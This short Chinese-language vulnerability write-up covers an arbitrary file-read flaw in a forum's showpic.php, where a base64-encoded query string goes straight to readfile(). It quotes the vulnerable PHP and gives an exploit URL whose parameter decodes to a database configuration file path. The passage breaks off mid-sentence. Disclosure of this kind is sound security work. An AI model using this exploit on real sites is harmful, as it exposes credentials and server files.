漏洞文件: showpic.php 引用: str=$_SERVER['QUERY_STRING']; $img=base64_decode($str); $codelen=strlen($safeguard);//获取附加码长度 $img=substr($img,$codelen); //去掉附加码 readfile($img); 提交的参数经过base64编码后直接用readfile读文件,所以可以把路径base64编码后提交,以读出文件内容 漏洞利用方式: http://bbs.xxx.com/showpic.php?ZGF0YS9zcWxfY29uZmlnLnBocA== 然后查看源文件。 这里的ZGF0YS...